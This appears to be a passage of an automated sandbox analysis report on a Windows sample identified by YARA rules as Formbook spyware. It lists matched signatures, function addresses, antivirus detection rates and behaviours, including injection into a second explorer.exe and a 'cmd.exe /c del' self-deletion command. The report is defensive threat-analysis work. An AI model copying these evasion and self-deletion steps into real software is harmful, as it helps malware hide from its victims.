cocacoding dot com Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 0_2_0040C340 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00452DE0 0_2_00452DE0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC 0_2_0044D1BC Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046724C 0_2_0046724C Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 1_2_00401026 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401030 1_2_00401030 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041DA67 1_2_0041DA67 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041D4F2 1_2_0041D4F2 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4F7 1_2_0041E4F7 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4FA 1_2_0041E4FA Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D87 1_2_00402D87 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D90 1_2_00402D90 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409E20 1_2_00409E20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041CEE3 1_2_0041CEE3 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E764 1_2_0041E764 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402FB0 1_2_00402FB0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B090 1_2_00A0B090 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1002 1_2_00AB1002 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 1_2_00A14120 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF900 1_2_009FF900 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2EBB0 1_2_00A2EBB0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0841F 1_2_00A0841F Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 1_2_00A0D5E0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F0D20 1_2_009F0D20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1D55 1_2_00AC1D55 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A16E30 1_2_00A16E30 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B090 5_2_0483B090 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 5_2_048520A0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F20A8 5_2_048F20A8 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F28EC 5_2_048F28EC Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1002 5_2_048E1002 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483841F 5_2_0483841F Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048ED466 5_2_048ED466 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 5_2_04852581 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F25DD 5_2_048F25DD Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 5_2_0483D5E0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F900 5_2_0482F900 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2D07 5_2_048F2D07 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04820D20 5_2_04820D20 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 5_2_04844120 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1D55 5_2_048F1D55 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F22AE 5_2_048F22AE Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2EF7 5_2_048F2EF7 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04846E30 5_2_04846E30 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485EBB0 5_2_0485EBB0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EDBD2 5_2_048EDBD2 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1FF1 5_2_048F1FF1 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2B28 5_2_048F2B28 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4F7 5_2_0023E4F7 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4FA 5_2_0023E4FA Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D87 5_2_00222D87 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D90 5_2_00222D90 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00229E20 5_2_00229E20 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222FB0 5_2_00222FB0
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0482B150 appears 35 times Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 009FB150 appears 32 times Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 00406A94 appears 57 times
 PE file contains strange resources Show sources
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: R6o4qCis6s.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
 Contains functionality for error logging Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421830 GetLastError,FormatMessageA, 0_2_00421830
 Contains functionality to check free disk space Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408E98 GetDiskFreeSpaceA, 2.00408e+103
 Contains functionality to load and extract PE file embedded resources Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004146E8 FindResourceA, 2.00415e+14
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
 Launches a second explorer.exe instance Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
 Parts of this applications are using Borland Delphi (Probably coded in Delphi) Show sources
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: R6o4qCis6s.exe Virustotal: Detection: 77% Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Jump to behavior Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' Jump to behavior
 Uses an in-process (OLE) Automation server Show sources
 Writes ini files Show sources
 Checks if Microsoft Office is installed Show sources